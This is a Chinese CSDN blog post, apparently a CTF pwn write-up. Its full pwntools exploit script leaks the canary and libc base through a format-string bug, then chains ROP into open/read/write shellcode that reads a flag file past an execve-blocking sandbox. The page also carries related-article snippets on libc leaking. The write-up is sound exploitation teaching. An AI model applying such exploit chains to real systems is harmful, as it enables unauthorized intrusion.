【pwn】orw&rop --泄露libc基址,orw

最新推荐文章于 2024-04-08 20:57:35 发布
最新推荐文章于 2024-04-08 20:57:35 发布
阅读量150 收藏 1
点赞数
文章标签: 安全 c语言 网络安全 python 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/question55/article/details/134773458
版权

我们先看看程序的保护的情况

因为题目提示了orw,我们可以沙箱检测一下

可以发现是禁用的execve函数的,接着看函数逻辑

这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置

可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

elf=ELF('./pwn')

libc=ELF('./libc.so.6')

io=remote("node4.buuoj.cn",28233)

puts_got=elf.got['puts']

io.recvuntil(b"sandbox\n")

payload=b'%8$s%11$p'+b'\x00'*7+p64(puts_got)

io.send(payload)

puts_addr=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

canary=int(io.recv(18),16)

print(hex(puts_addr))

print(hex(canary))

base=puts_addr-libc.sym['puts']

rdi=0x2a3e5+base

rsi=0x2be51+base

rdx_r12=0x11f497+base

read_addr=base+libc.sym['read']

ret=0x29cd6+base

io.recvuntil(b"flag now\n")

payload2=b'a'*0x28+p64(canary)+b'a'*0x8+p64(rdi)+p64(0)+p64(rsi)+p64(0x66660000)+p64(rdx_r12)+p64(0x100)+p64(0)+p64(read_addr)+p64(0x66660000)

io.send(payload2)

addr=0x66660000+0x200

payload3=shellcraft.open("./flag")

payload3+=shellcraft.read(3,addr,0x50)

payload3+=shellcraft.write(1,addr,0x50)

payload3=asm(payload3)

io.send(payload3)

io.interactive()

question55
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
libc-database:建立libc偏移量数据库以简化开发
04-01
网页界面 libc数据库现在具有Web服务和前端。 访问尝试一下! 如果您对API感兴趣,请阅读 。 建立一个libc偏移量数据库 如果您遇到错误,请检查下面的“要求”部分。 获取所需的libc类别并提取符号偏移量。 它不会下载任何东西两次,因此您也可以使用它来更新数据库: $ ./get # List categories $ ./get ubuntu debian # Download Ubuntu's and Debian's libc, old default behavior $ ./get all # Download all categories. Can take a while! 您还可以将自定义libc添加到数据库中。 $ ./add /usr/lib/libc-2.21.so 在数据库中找到在给定地址上具有给定名称的所有libc。 仅检查最后12位,因为随
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
通过给的libc泄露函数地址
zszcr的博客
03-22 5447
libc中的函数相对于libc的基地址的偏移都是确定的,如果有一道题给你了libc的文件,就可以通过libc文件泄露出system函数和binsh的地址,然后再构造payload。一般通过write()函数泄露 ,通过ELF获得write函数在got表和plt表中的地址同时获得程序start地址 构造payload payload 一般是填充字符(栈的大小)+ ‘aaaa’(覆盖EBP)+  p3...
[NKCTF2024]-PWN:leak解析(中国剩余定理泄露libc地址,汇编覆盖返回地址)
最新发布
2301_79326813的博客
04-08 319
查看保护查看ida先放exp。
nssctf pwn专项比赛——rbp(栈迁移,orw
xiaolei0413的博客
08-01 353
而read是读入0x220个字节bss也就是现在的rbp对应的是p64(bss-0x218)位置这样在read函数执行完之后就会把(bss-0x218)作为新的rbp,然后return到leave地址,那么(bss-0x218)就是新的rsp指向(pop_rdi),这就是为什么在bss地址(上一个rbp)写入(bss-0x218)作为地址了,然后return继续执行(pop_rdi)一系列rop链。这样成功把bss变为新的rbp,然后return回到read,但是这次的输入已经不是往原来的栈上写了。
利用puts函数泄露libc内存信息
zszcr的博客
03-22 3023
puts函数puts的原型是puts(addr),即将addr作为起始地址输出字符串,直到遇到“x00”字符为止。也就是说,puts函数输出的数据长度是不受控的,只要我们输出的信息中包含x00截断符,输出就会终止,且会自动将“n”追加到输出字符串的末尾,这是puts函数的缺点,而优点就是需要的参数少,只有1个,无论在x86还是x64环境下,都容易调用。为了克服输入不受控这一缺点,我们考虑利用put...
泄露libc
inquisiter
01-12 1491
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如"%n"和"%12$p"这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露libc基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
pwnorw
weixin_43960998的博客
06-19 1717
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
PWN · ORW | shellcode】[HGAME 2023 week1]simple_shellcode
Mr_Fmnwon的博客
01-04 592
注意,对于第一次输入的限制,这里刻意的打印了两种shellcode的长度。
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 614
pwn 64位 泄露libc版本
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4092
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
pwnable_orw-seccomp沙箱
个人笔记
04-11 685
但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。还能调用o(open)/r(read)/w(write)功能,题目orw的提示就是这样来的!输出flag文件内容,sys_write(1,file,0x30);手动生成读取文件shellcode。
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
泄露libc库、shellcode、__libc_csu_init
RKAnjia的博客
12-21 711
level4、第四届蓝帽杯pwn-slient泄露libcwrite函数输出地址puts函数输出地址puts函数输出完地址后没有其他输出puts函数输出完地址后还有其他输出注意shellcode如何写入shellcode?如何使得shellcode执行?_libc_csu_init 泄露libc (有很多是摘自link) write函数输出地址 当题目程序中的输出函数是write函数时,我们就可以利用write函数把write函数的真实地址输出出来。 下面给出write函数的DynELF写法模板(64位):
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1053
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
什么是gadget,以及64位libc如何泄露的问题
qq_43557177的博客
04-06 2755
最近开始学PWN,本以为栈溢出也就那些东西,看来是我少虑了… 在这里对这几天所学习的64位栈溢出泄露Libc的相关知识做一个小总结,当然,如果可以帮助到在读文章的你就更好啦。如果文中有错误,也希望各位大佬予以斧正。 什么是LIbc? 这个就是libc 这是一个动态链接文件 那么什么是动态链接和静态链接? 可以理解为: 静态链接:在程序编译的过程中,就预先把代码加载进程序中 //比如大家都经常写的...
[pwn]ROP:信息泄露获取libc版本和地址
热门推荐
Breeze的博客
08-26 1万+
文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具是pwntools中的D以内ELF模块。 DynEL...
&p->payload
07-28
回答: 在引用\[1\]中的代码中,"&p->payload"是指针p的payload成员的地址。这个地址可以用来访问和操作p的payload数据。在这个代码片段中,payload被用来构造一个特定的数据包,然后通过网络发送出去。在引用\[2\]中的代码中,payload指针被设置为指向某个区域,用于存储数据。在引用\[3\]中的代码中,pbuf_free(p)释放了指针p所指向的内存空间,包括payload数据。所以,"&p->payload"是一个指向p的payload数据的指针。 #### 引用[.reference_title] - *1* [CTF PWN - ROP ->Payload实例(攻防世界level2)](https://blog.csdn.net/yajuanpi4899/article/details/121153088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [LWIP网络数据包](https://blog.csdn.net/u012142460/article/details/79962441)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [lwip源码分析之 TCP协议 数据输入 (一)](https://blog.csdn.net/weixin_44821644/article/details/111339566)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值